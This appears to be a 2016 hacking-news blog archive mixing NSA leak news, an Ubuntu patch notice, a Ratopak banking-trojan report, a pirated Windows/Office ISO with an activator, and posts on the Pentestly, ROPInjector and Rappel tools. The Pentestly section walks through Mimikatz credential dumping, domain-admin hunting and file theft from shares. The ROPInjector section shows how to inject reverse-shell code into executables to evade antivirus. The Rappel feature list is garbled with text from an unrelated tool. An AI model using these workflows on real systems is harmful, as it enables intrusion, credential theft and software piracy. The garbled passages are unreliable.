الثلاثاء، 23 فبراير 2016

NSA Spied On Secret Meetings Between The Top Leaders

NSA Spied On Secret Meetings Between The Top Leaders


NSA Spied On Secret Meetings Between The Top Leaders 


The top secret documents have been published by the Wikileaks in which there was information regarding the NSA spied. NSA spied on many world leaders private meetings, some of them are:


  • Meetings between UN chief Ban Ki-Moon and Angela Merkel(German Chancellor).
  • Meetings between the Prime Ministers of Italy and Israel.

According to that documents, "NSA spied on a very high-level of meetings which are regarding any of environmental issues, economic problems etc."

Julian Assange (Wikileaks founder and editor) said that "The meeting of Ban Ki-Moon’s(UN Secretary General) is showed to you through this documentary, how to save the planet from climate change, and to also prevent or protect their largest oil companies, "



Previously they published about the stealing of secretary general’s DNA by the US diplomats, and the agreement has also signed by the US government, that they will not engage in such conduct against UN.

For common people it will be very interesting to see the UN's reaction. Everyone from world leader to sweeper all is at risk, because of the target to secretary general without any consequence.

The other leaks are related to or light to other important meetings like meetings between Prime Minister of Israel and Italy in the year 2010. During that meeting Benjamin Netanyahu, Prime Minister of Israel pleaded to the Italian Prime Minister (Berlusconi) in order to help him in a deal with Obama (US President).



The document which contains the another meeting was regarding the tasked by key EU and Japanese trade ministers in which they discussed about the WTO negotiations. Not only this, that document also included the secret conversation between Nicolas Sarkozy(former French President) and Silvio Berlusconi (former Italian Prime Minister) this means that NSA was able to gain access to a secret conversation between them.

"Apart from these all spied incidents, UN's Refugee Agency was also spied by NSA, in which NSA found that US intelligence agents reportedly kept tabs on the phone lines of the organization’s regional directors, including that of the regional representative of the United Nations Office of the High Commissioner for Refugees (UNHCR) for Central Asia, Bernard Doyle,"  according to the new report.

Johann Human's (Director of the Rules Division of the WTO) Swiss telephone line has also been targeted by the NSA, showed by Wikileaks.



The secret documents regarding government overreaches and abuses are disclosed by Wikileaks like any US military related information, any secret meetings between famous leaders, any documents regarding CIA etc.

According to CNN Report,

The Italian Foreign Ministry has summoned the U.S. ambassador, John Phillips, to clarify the news appeared (in) the press, according to which the Italian Prime Minister Silvio Berlusconi and some of his close collaborators would have been subject to wiretaps in 2011," a ministry statement reads.

Linux Kernel Vulnerability For Ubuntu 12.04 LTS And 14.04 LTS Have Been Patched


Linux Kernel Vulnerability For Ubuntu 12.04 LTS And 14.04 LTS Have Been Patched


On September 3, details about the minor kernel update for Ubuntu 12.04 LTS and Ubuntu 14.04 LTS has been published by the Canonical immediately, when they informed the Ubuntu users about the existence of important kernel update for their systems. 


According to them, only the minor security issue has been fixed, that exist in Linux kernel's key ring subsystem, and because of that attackers can easily target the local attackers to crash the system by using DoS(Denial-of-service) attack.

According to a note by Ubuntu Security Notice USN-2911-1, which is published "The releases of Ubuntu and its derivatives has been affected by the Security issue. Under certain conditions system could be crashed"

Ubuntu 12.04 LTS users have to update their systems as soon as possible. The new kernel version is linux-image-3.2.0-99 (3.2.0-99.139).

To update the Ubuntu 12.04 LTS, just follow some simple steps:

  • Software Updater utility is run from the Unity Dash.
  • You have to wait for the tool to reload the software repositories and find new updates.
  • Press Install button to install all available updates.
  • Reboot The system, once when all the updates have been installed.

If any third-party kernel module is installed on your system then you have to rebuild it.

Pentestly A Python and Powershell Internal Penetration Testing Framework Tool

Pentestly A Python and Powershell Internal Penetration Testing Framework Tool

Pentestly: A Python and Powershell Internal Penetration Testing Framework Tool


Pentestly is a tool for penetration tests. It is a combination of expanding Python tools. The main aim of the Pentestly tool is to utilize the familiar user interface. With the power of Python, the contribution to the framework should be easy. Pentestly utilizes the power of Python, Powershell etc tools together in a familiar user experience.


These are the current tools utilized in Pentestly:

Invoke-Mimikatz.ps1 - By using this tool, we can easily implement Mimikatz in Powershell.
wmiexec.py - These tools enable us to execute Powershell commands quickly and easily via WMI.
recon-ng - For data manipulation recon-ng (Backend database) is beautifully made and leveraged.
smbmap.py - It is used for enumerating SMB shares.
powercat.ps1 - For providing Netcat-esque functionality in Powershell


Features of Pentestly:

>> It is able to import NMAP XML.
>> It can also enable to test SMB authentication using the following:
  •       credentials of an individual.
  •       file containing and null credentials.
  •       By using NTLM hash also.

>> For SMB authentication successful it can test local administrator privileges also.
>> It can also identify readable SMB shares for valid credentials
>> It also provides the feature of Storing Domain/Enterprise Admin account names.
>> It can easily determine a location of running Domain Admin processes and can also determine systems of logged in Domains Admins.
> It also provides a feature of executing Powershell commands in memory and exfil results and Mimikatz to gather plaintext password from memory.


How you can install it:

For installation you need to follow these steps or commands:

git clone https://github.com/praetorian-inc/pentestly.git
./install.sh
./pentestly


How you can use it:

Step 1-Workspace must be changed-

[pentestly][default] > workspaces list

  +------------+
  | Workspaces |
  +------------+
  | default    |
  +------------+

[pentestly][default] > workspaces add project
[pentestly][project] > workspaces select project


Step 2- Load from nmap

[pentestly][project][nmap_xml] > load nmap
[pentestly][project][nmap_xml] > set filename /root/PROJECT/full-all-alive.xml
FILENAME => /root/PROJECT/full-all-alive.xml
[pentestly][project][nmap_xml] > show options

Name              Current Value                  Required    Description
--------          -------------                  --------    -----------
FILENAME  /root/PROJECT/full-all-alive.xml         yes        Path and filename for nmap XML input

[pentestly][project][nmap_xml] > run

Step 3- Test logins

For test logins use file with creds 

[pentestly][project][login] > cat /tmp/creds
[*] Command: cat /tmp/creds
user1 pass1
user2 pass2
[pentestly][project][login] > load login
[pentestly][project][login] > set userpass_file /tmp/creds
USERPASS_FILE => /tmp/creds
[pentestly][project][login] > set username ''
USERNAME => ''
[pentestly][project][login] > set password ''
PASSWORD => ''
[pentestly][project][login] > run

Single username & password must be used

[pentestly][project][login] > load login
[pentestly][project][login] > set username admin
USERNAME => admin
[pentestly][project][login] > set password password
PASSWORD => password
[pentestly][project][login] > set userpass_file ''
USERPASS_FILE => ''
[pentestly][project][login] > run

Use credentials over a small subset of IPs 

[pentestly][project][login] > load login
[pentestly][project][login] > set username admin
USERNAME => admin
[pentestly][project][login] > set password password
PASSWORD => password
[pentestly][project][login] > set userpass_file ''
USERPASS_FILE => ''
[pentestly][project][login] > run
[pentestly][project][login] > set source query select * from pentestly_creds where host like '192.168.8.%'

Step 4- Domain and Enterprise admins must be Gather

[pentestly][project][login] > load get_domain # Notice fuzzy searching - get_domain finds get_domain_admin_names
[pentestly][project][get_domain_admin_names] > show options

Name    Current Value  Required  Description
------  -------------  --------  -----------
SOURCE  default        yes       source of input (see 'show info' for details)

[pentestly][project][get_domain_admin_names] > run
[*] Found Domain Admin: domain\admin1
[*] Found Domain Admin: domain\admin2


Step 6-Mimikatz should be run over IPs with executable rights

[pentestly][default][get_domain_admin_names] > load mimi
[pentestly][default][mimikatz] > run
For hosting scripts select the  local interface 

0. 127.0.0.1
1. 10.220.8.94
2. 172.27.67.14
> 1
[*] Execution creds: domain\Admin:adminpassword@192.168.1.1
[*] Success! Admin.DA:p@$$w0rd  - DOMAIN ADMIN!

Step 7- Show local admins

[pentestly][default][show_local_admins] > load show_local_admins
[pentestly][default][show_local_admins] > run

+---------------------------------------------------------------------------------------------------------------+
|      host      | access |  username  |  password  | domain | process | logged_in | success | execute | module |
+---------------------------------------------------------------------------------------------------------------+
| 10.202.208.112 |        | nsportsman | password1! | zojix  |         |           | True    | True    | login  |
+---------------------------------------------------------------------------------------------------------------+

Step 8-Show domain admins

[pentestly][default][show_domain_admins] > load show_domain_admins
[pentestly][default][show_domain_admins] > run

+--------------------------------------------------------------------------------------------------------------------------+
|      host      | access        | username  |  password       | domain | process | logged_in | success | execute | module |
+--------------------------------------------------------------------------------------------------------------------------+
| 10.202.208.112 | Domain Admin  | TheRealDA | </l33TPassword> | zojix  |         |           | True    | True    | login  |
+--------------------------------------------------------------------------------------------------------------------------+

Step 9-Enumshares:

[pentestly][default] > load enums
[pentestly][default][enumshares] > run
[*] Execution creds: workgroup\Administrator:BadAdminPassword@192.168.224.252
defaultdict(<type 'list'>, {'readonly': [u'ADMIN$', u'C', u'C$', u'Users'], 'noaccess': [u'IPC$']})

Step 10-Show new shares:

[pentestly][default][interesting_files] > show pentestly_shares

+------------------------------------------------------------------------------------------------+
| rowid |       host      |    username   | readwrite |      readonly     | noaccess |   module   |
+-------------------------------------------------------------------------------------------------+
| 1     | 192.168.224.252 | Administrator |           | ADMIN$,C,C$,Users | IPC$     | enumshares |
+-------------------------------------------------------------------------------------------------+

Step 11-Find/Download interesting files

[pentestly][default][interesting_files] > show options

    Name     Current Value                                                                                                                              Required  Description
-------  -------------                                                         ---------  -----------
    PATTERN  (Groups.xml|Services.xml|Printers.xml|Drives.xml|DataSources.xml|ScheduledTasks.xml|unattend|important|passw|backup|setup).*[^dll][^exe]$  yes       Regex pattern to look for in filenames
    SOURCE   default                                                                                                                                    yes       source of input (see 'show info' for details)

Can change the pattern to something a bit more specialized

[pentestly][default][interesting_files] > set pattern important.txt|super_secret
PATTERN => important.txt|super_secret
[pentestly][default][interesting_files] > show options

    Name     Current Value               Required  Description
    -------  -------------               --------  -----------
    PATTERN  important.txt|super_secret  yes       Regex pattern to look for in filenames
    SOURCE   default                     yes       source of input (see 'show info' for details)

Execute and download found files

[pentestly][default][interesting_files] > run
[*] Administrator
[*] Execution creds: workgroup\Administrator:BadAdminPassword@192.168.224.252
[+] Match found! Downloading: Users\Administrator\Desktop\important.txt.txt
192.168.224.252-Users_Administrator_Desktop_important.txt.txt
[+] Match found! Downloading: Users\Administrator\Desktop\super_secret.txt
192.168.224.252-Users_Administrator_Desktop_super_secret.txt


Contributing:

Creating new modules is easy in Pentestly. Begin with the code provided in skeleton.py:

from libs.pentestlymodule import PentestlyModule

class Module(PentestlyModule):

    meta = {
        'name': 'Your module name goes here',
        'author': 'Developer name goes here',
        'description': 'Description of the module goes here',
        'query': 'SQL QUERY whose result is passed to your module',
        'options': (
            ('Option1', 'Default Value', Required-True/False, 'Description of option'),
        ),
    }

    def module_pre(self):
        # Optional
        # Happens before your module

    def module_run(self, data):
        # Required
        # data is the result from the SQL query set in the options

        ### Few magic functions
        # self.query - Perform an SQL query on the internal database
        results = self.query("select * from pentestly_creds")

        # self.output - print default information to the user
        self.output("Performed an SQL query")
        self.output(results)

        # self.alert - print the successful message to the user
        self.success("Yay! We performed successful work")

    def module_post(self):
        # Optional
        # Happens after your module


TODO:


  • secretsdump.py module should be implemented. 
  • Add utility functions for database queries similar to creds, services
  • To have fixed width columns rework draw_table function 
  • Import credentials from Gladius
  • Implement GPP password search and decrypt module


Hackers Steal Information From Russian Bank Employees Via Malware

Hackers Steal Information From Russian Bank Employees Via Malware

Hackers Steal Information From Russian Bank Employees Via Malware


For The Purpose Of Stealing Information The Hackers Delivered Trojan To Making The Targeted To The Employees Of At least 6 Russian Banks Through Fake Emails. And The Attack Is Known As ‘Ratopak.’


The employees of some respective Russian Banks became a target from fake or you can say spoofed emails in December 2015. And all of you know that this is a very common technique for attacking any site to hack something. And the shocking part is that the emails were looked like same as they sent from the Central Bank Of Russia to offering the employment to their receivers. But in actual there were a Trojan ‘Ratopak’ deliver into the targeted user’s computer.

And you know what with the help of this Trojan Ratopak the hackers can gain the controlling power of targeted computer and they can easily steal the information. Do you know how it is possible?? 

No, okay! I’ll tell you the attacker can enter into the targeted system to perform various actions through a back door which can open by the threat. And then attacker performs many harmful actions like – logging, viewing & controlling the screen, keystrokes and retrieving clipboard data & so on. 

Authorized Emails:

Mostly hackers always try to target the legal or you can say authorized website or emails. For this, they can register a corresponding domain which may be similar from that authorized website just like Central Bank of Russia website. 

Usually, the URL of Central Bank Of Russia website is “cbr.ru” and you know what the attackers website’s URL was “cbr.com.ru”. From this website the hackers sent an archive file included their victims email. 

And when a user opens that archive file and also a fake file then downloaded the Ratopak Trojan, after that the attackers can sign into the targeted computer through stolen certificates that can easily avoid detection and also make a legitimate way to appear the malware in their system. 

Black Vine & Hidden Lynx are two groups which used the stolen certificates. And they have used the emails for sending to the target users which is written by a native Russian speaker in a very simple and clean language. This shows that the attackers also needed a perfect speaker in a particular language for making the information useful and stolen by Ratopak. 

There are only two minor errors in their email – First is the name in the “From:” line of the email header differs from the signature at the end of the email.  And the second is that “.com” in the URL, which is the clear indication of that this is a fake email.

Spoofed email offer (in Russian language) with a link to Trojan.Ratopak  | Screenshot by Symantec

Targeted Attacks: 

At least six Russian Banks which were pointed for their attacks. And the amazing thing is that the attackers were only targeted the Russian and Ukrainian computers that’s why they affected the all those systems which are located in Russia. And all of them have very confidential and secret data just like – secured documents of government for tax purposes or so on. 

For example, a common link of the victims was a piece of software created by SBIS, a Russian company that develops, among other things, accounting and payroll applications. In URLs used by SBIS, their accounting software is referred to as “buh”. Then attackers make their similar approach for the purpose of attacking which is labeled as Trojan.Ratopak as “Buhtrap”. 

That’s why the targeted system may connect to the following domains; note the use of “buh” in several of them:

•    google997.com
•    microsoft775.com
•    newsbuh1c.net
•    buh.klerk.us
•    buhnews.com
•    football.championat.biz
•    forum.ru-tracker.net
•    icq.chatovod.info
•    rss.sport-express.biz

CONCLUSION:

The goal of the attackers was always financial motivation. As I told you that they were always only target the Russian and Ukrainian computers because they make it for checks the language of the compromised computer. If it isn’t Russian or Ukrainian, then the malware stops its attack. Ratopak may also terminate and delete itself if it recognizes that it is being run on a virtual machine or a researcher’s computer.

Image source: Getty

Windows 10 Pro + Office 2016 64 Bits PT-BR



Windows 10 Pro + Office 2016 64 Bits PT-BR Integrados na ISO
Criado por Raton com MENU interativo onde você tem as opções Office 2016 64 Bits + Ativador + Tutorial + NET Framework 4.0
Lembrando que foi integrado com Ativador Re-Loader tanto ativa o Windows 10 como Office 2016.
    
A ISO usada do Windows 10 Pro  Original baixado da  msdn diminuída pelo meu amigo D.Dias


 Office 2016 64 Bits PT-BR Menu Interativo de instalação e ativação criado por mim, para ser gravado tranquilamente em um DVD comum facilitando o pós formatação.

IMAGEM REAL DO MENU INTERATIVO




Segue o vídeo do canal ''Canaia Tutoriais'' falando sobre essa ISO , peço para dar um like e se inscrever no canal Canaia Tutoriais, um dos canais mais promissores do youtube em matéria de tutorial...

Inscreva-se: CANAIA TUTORIAIS :



Ano:2016
Gravar:DVD comum 4.7 GB
Créditos: RATON
Tamanho: 3.91 GB




Raton Shop


Download TORRENT
Download TORRENT :

ou

Download MEGA
Download BR2Share Parte 1
Download BR2Share Parte 2
Download BR2Share Parte 3
Download BR2Share Parte 4

Para Burlar o Download limitado e o tempo de espera do MEGA baixe o programa Megadownloader, clique na imagem abaixo.Raton Shop


Raton Shop
Raton Shop

الاثنين، 22 فبراير 2016

ROPInjector: To Convert Shellcode Into ROP

ROPInjector: To Convert Shellcode Into ROP


ROPInjector: To Convert Shellcode Into ROP



ROPInjector is a tool by which any shellcode can be converted into ROP and is written in C(Win32). It only supports 32-bit and the x86 instruction set.


ROPInjector is published in Blackhat USA 2015, Abbreviation of "ROPInjector: Return Oriented Programming for Polymorphism and Antivirus Evasion


If you need white paper then go to this link:

•(WhitePaper)


For presentation just need to visit this link:

•(Presentation)


How to Use it:

Usage

ropinjector <file-to-infect> <shellcode-file> <output-file>* [options]*

e.g.
ropinjector.exe firefox.exe revshell.txt

file-to-infect : any 32-bit, non-packed PE
shellcode-file : the shellcode to patch in the PE file
output-file (optional) : The name of the output file. If not specified, ROPInjector will choose a suitable filename indicating the type of injection performed.
options :


    text        Force reading of shellcode file as text file. Shellcode in text
                form must be in the \xHH\xHH\xHH format.

    norop       Don't transform shellcode to ROP.

    nounroll    Don't unroll SIBs.

    noinj       Don't inject missing gadgets.

    getpc       Don't replace getPC constructs in the shellcode.

    entry       Have shellcode run before the original PE code. Without this
                option, ROPInjector will try to hook calls to ExitProcess(),
                exit() and the like so that the shellcode runs last, right
                before process exit.

    -d<secs>    Number of seconds to Sleep() before executing the shellcode.
                When this option is specified, "entry" is also implicitly used.


The order of output with some comma-delimited stats in the end given by ROPInjector tool are:

the carrier PE filename
the output filename of the resulting patched file
initial size of the PE file in bytes
size of shellcode in bytes
size of patch in bytes
whether unroll is performed
whether shellcode has been converted to ROP
whether getPC constructs are replaced in the shellcode
whether access is given to the shellcode during entry (run first) or during exit (run last)
the delay the shellcode sleeps before it runs in seconds
initial number of instructions in the shellcode
number of instructions in the shellcode after unrolling and other manipulations, but before ROP
number of instructions replaced by ROP gadgets (out of the ones in the previous metric, and not the initial number of instructions)
number of gadgets injected
number of gadget segments
number of instructions replaced by injected gadgets


LICENSE

The license is under the GPLv2.0, You can also go to this link for further information (http://www.gnu.org/licenses/old-licenses/gpl-2.0.html).

Download

A Linux-Based Janky Assembly REPL Tool For x86, amd64, And armv7

A Linux-Based Janky Assembly REPL Tool For x86, amd64, And armv7

A Linux-Based Janky Assembly REPL Tool For x86, amd64, and armv7.


Rappel is a janky assembly REPL which works starting it under ptrace, by creating shell ELF, then continuously rewriting/running the .text section. Rappel supports on amd64, armv7 and Linux x86.


Features Of Rappel:

Rappel provides many features some of them are:

To-dos: It is associated with the currently worked project. To-dos lists contain specific To-dos, assign & reassign to team members, set due dates, mark To-dos and add To-dos and you can also view them.

Overview: It enables us to view discussions, files of our project and to-dos also. It also shows us the activity of other people associated with our projects. It contains Key dates and events.

Discussions: This feature allows us to view discussions around To-dos within your projects.

Files: It allows quick access to the project files.

How to install Rappel:

The only dependencies are libedit an assembler (nasm on x86/amd64, as on ARM) , which on debian can be installed with thelibedit-dev and nasm/binutils packages.
$ CC=clang make

It should work fine with gcc, albiet with a few more warnings.

By default rappel is compiled with your native architecture. If you're on amd64 and want to target x86 you can do this with

$ ARCH=i386 CC=clang make

For the functioning of rappel, the architecture of the main rappel binary must match that of the process it creates, and the host must be able to run binaries of this architecture.


For Running:

Rappel has two modes it can operate in. A pipe mode for one off things.

$ echo "inc eax" | bin/rappel
rax:0x0000000000000001  rbx:0x0000000000000000  rcx:0x0000000000000000  rdx:0x0000000000000000
rsi:0x0000000000000000  rdi:0x0000000000000000  r8 :0x0000000000000000  r9 :0x0000000000000000
r10:0x0000000000000000  r11:0x0000000000000000  r12:0x0000000000000000  r13:0x0000000000000000
r14:0x0000000000000000  r15:0x0000000000000000
rip:0x0000000000400003  rsp:0x00007fffffffee80  rbp:0x0000000000000000
flags:0x0000000000000202 [CF: 0, ZF: 0, OF: 0, SF: 0, PF: 0, AF: 0]
$

Or an interactive mode:

$ bin/rappel
rax:0x0000000000000000  rbx:0x0000000000000000  rcx:0x0000000000000000  rdx:0x0000000000000000
rsi:0x0000000000000000  rdi:0x0000000000000000  r8 :0x0000000000000000  r9 :0x0000000000000000
r10:0x0000000000000000  r11:0x0000000000000000  r12:0x0000000000000000  r13:0x0000000000000000
r14:0x0000000000000000  r15:0x0000000000000000
rip:0x0000000000400001  rsp:0x00007fffffffee80  rbp:0x0000000000000000
flags:0x0000000000000202 [CF: 0, ZF: 0, OF: 0, SF: 0, PF: 0, AF: 0]
> inc rax
rax:0x0000000000000001  rbx:0x0000000000000000  rcx:0x0000000000000000  rdx:0x0000000000000000
rsi:0x0000000000000000  rdi:0x0000000000000000  r8 :0x0000000000000000  r9 :0x0000000000000000
r10:0x0000000000000000  r11:0x0000000000000000  r12:0x0000000000000000  r13:0x0000000000000000
r14:0x0000000000000000  r15:0x0000000000000000
rip:0x0000000000400004  rsp:0x00007fffffffee80  rbp:0x0000000000000000
flags:0x0000000000000202 [CF: 0, ZF: 0, OF: 0, SF: 0, PF: 0, AF: 0]
> push rax
rax:0x0000000000000001  rbx:0x0000000000000000  rcx:0x0000000000000000  rdx:0x0000000000000000
rsi:0x0000000000000000  rdi:0x0000000000000000  r8 :0x0000000000000000  r9 :0x0000000000000000
r10:0x0000000000000000  r11:0x0000000000000000  r12:0x0000000000000000  r13:0x0000000000000000
r14:0x0000000000000000  r15:0x0000000000000000
rip:0x0000000000400002  rsp:0x00007fffffffee78  rbp:0x0000000000000000
flags:0x0000000000000202 [CF: 0, ZF: 0, OF: 0, SF: 0, PF: 0, AF: 0]
> pop rbx
rax:0x0000000000000001  rbx:0x0000000000000001  rcx:0x0000000000000000  rdx:0x0000000000000000
rsi:0x0000000000000000  rdi:0x0000000000000000  r8 :0x0000000000000000  r9 :0x0000000000000000
r10:0x0000000000000000  r11:0x0000000000000000  r12:0x0000000000000000  r13:0x0000000000000000
r14:0x0000000000000000  r15:0x0000000000000000
rip:0x0000000000400002  rsp:0x00007fffffffee80  rbp:0x0000000000000000
flags:0x0000000000000202 [CF: 0, ZF: 0, OF: 0, SF: 0, PF: 0, AF: 0]
> cmp rax, rbx
rax:0x0000000000000001  rbx:0x0000000000000001  rcx:0x0000000000000000  rdx:0x0000000000000000
rsi:0x0000000000000000  rdi:0x0000000000000000  r8 :0x0000000000000000  r9 :0x0000000000000000
r10:0x0000000000000000  r11:0x0000000000000000  r12:0x0000000000000000  r13:0x0000000000000000
r14:0x0000000000000000  r15:0x0000000000000000
rip:0x0000000000400004  rsp:0x00007fffffffee80  rbp:0x0000000000000000
flags:0x0000000000000246 [CF: 0, ZF: 1, OF: 0, SF: 0, PF: 0, AF: 0]
> ^D
$

x86 looks like:

$ echo "nop" | bin/rappel
eax:0x00000000  ebx:0x00000000  ecx:0x00000000  edx:0x00000000
esi:0x00000000  edi:0x00000000
eip:0x00400002  esp:0xffffdf10  ebp:0x00000000
flags:0x00000202 [CF: 0, ZF: 0, OF: 0, SF: 0, PF: 0, AF: 0]
$

ARM looks like:

$ echo "nop" | bin/rappel
R0 :0x00000000  R1 :0x00000000  R2 :0x00000000  R3 :0x00000000
R4 :0x00000000  R5 :0x00000000  R6 :0x00000000  R7 :0x00000000
R8 :0x00000000  R9 :0x00000000  R10:0x00000000
FP :0x00000000  IP :0x00000000
SP :0xbe927f30  LR :0x00000000  PC :0x00400004
APSR:0x00000010
$